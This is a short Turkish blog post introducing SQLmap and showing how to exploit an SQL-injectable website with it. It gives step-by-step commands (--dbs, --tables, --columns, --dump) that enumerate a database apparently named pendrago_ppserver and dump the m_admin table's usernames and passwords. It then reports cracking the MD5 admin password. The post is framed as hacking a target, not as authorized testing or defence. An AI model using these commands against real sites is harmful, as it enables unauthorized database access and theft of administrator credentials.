SQLmap Nedir ? Nasıl Kullanılır ?

Web hackingde kullanılan toolların başında gelen SQLmap Nedir ? hakkında bilgi vereceğim.

Web hacking bölümünde zayifetler denince SQL injection akla gelir. Bu açığı sömürmek için kullanılan araç SQLmap’dir. SQLmap açık kodlu zafiyet tespit ve sömürme aracıdır. İçerisinde onlarca paremetre vardır . Bu sayede açığı sömürmek daha kolaydır.

SQLmap Paremetreleri

SQLmap zayifet sömürme aracında birden çok paremetre vardır. Bunları görmek için “python sqlmap –help” diyerek . Paremetrelerin nasıl kullanıldığı hakkında bilgi sahibi olabilirsiniz.

SQL Açıklı Siteyi Sömürme 

Şimdi size sql açıklı bir siteyi nasıl sömüreceğimizden bahsedeceğim. “sqlmap -u “sömürülecek site” –dbs” yazarak sitenin veritabanını çekiyoruz.

Veritabanını çekdiğimiz sitenin sıra tablo kısmını çekmeye geldi. Bunu da “sqlmap -u “sömürülecek site” -D pendrago_ppserver(sitenin veritabanı ismi) –tables” diyerek tabloları çekiyoruz.

Tablolar kısmınıda çekdik. Bundan sonra size hangi tablo kısmı işinizi görecekse onu çekmelisiniz. Ben m_admin kısmını çekeceğim. Bunun için öncellikle “sqlmap -u “sömürülecek site” -D pendrago_ppserver(sitenin veritabanı ismi) -T m_admin(tablo kısmından çekmek istediğimiz yer) –columns” diyerek m_admin kısmını çekiyoruz.

İstediğimiz bölümde username ve password kısmını çekicez bu sefer . Bu bölüm sitenin sahibi olan adminin bilgileri. Bunuda “sqlmap -u “sömürülecek site” -D pendrago_ppserver(sitenin veritabanı ismi) -T m_admin(tablo kısmından çekmek istediğimiz yer) -C username,password –dump” diyerek şifre ve ismi içeren bilgileri çekiyoruz.

Gördüğünüz gibi SQLmap sayesinde Md5 ile şifrelenmiş password kırdık ve şifreyi öğrenmiş olduk.

SQLmap hakkında daha fazla bilgi almak için resmi siteleri olan sqlmap.org ziyaret edebilirsiniz.

Okuduğunuz için teşekkürler…

Bir sonraki yazımız : https://sibermanset.com/telegramdan-whatsappa-gondermeler/

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s